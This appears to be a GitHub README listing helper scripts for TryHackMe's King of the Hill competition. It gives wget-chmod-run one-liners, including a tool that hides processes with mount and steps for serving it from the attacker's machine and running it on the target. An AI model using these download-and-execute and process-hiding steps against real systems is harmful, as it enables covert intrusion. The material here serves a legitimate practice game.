Skip to content

Latest commit

 

History

History

KoTH--King of The Hill

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 

בס״ד


📜 KoTH Menu ~ To Do

  • 📜 Menu

1️⃣ ~ KoTH ~> TryHackMe VPN

Simple helper script for VPN, VM's, etc

wget https://raw.githubusercontent.com/Anlominus/KoTH/main/KoTH; chmod +x KoTH; ./KoTH

2️⃣ ~ KoTH-Protection ~> Protecting Rank in King of The Hill

A script to protect your king

wget https://raw.githubusercontent.com/Anlominus/KoTH/main/KoTH-Protection ; chmod +x KoTH-Protection; ./KoTH-Protection

3️⃣ ~ KoTh-Hidding ~> A simple script to hide a process with mount

wget https://raw.githubusercontent.com/Anlominus/KoTH/main/KoTH-Hidding; && chmod +x KoTh-Hidding; ./KoTh-Hidding
  • Start local server
    • python3 -m http.server 80
  • in the Target Machine
    • wget http://yourvpnip/KoTh-Hidding && chmod +x KoTh-Hidding && ./KoTh-Hidding

TryHackMe Menu ToDo


  • Scope
    • 1️⃣ Asking For Your Username:
    • 2️⃣ Asking For TryHackMe User Name:
    • 2️⃣ Asking For TryHackMe VPN File Location:
    • 5️⃣ Asking For IP Target: >>> ${ip_Target}
    • 6️⃣ Asking For Name Target: >>> ${ip_Target_Name}
    • 4️⃣ Asking Location For Reporting: >>> ${export_Log_To}

  • 1️⃣ Adding ${box_ip} ${box_name} ~>> /etc/hosts
    • sudo echo "${box_ip} ${box_name}" >> /etc/hosts
  • 2️⃣ Asking For TryHackMe VPN File Location:
  • 3️⃣ Asking Location for Reporting:

  • Anonymity Surfing
    • anonsurf status
    • anonsurf start
    • anonsurf stop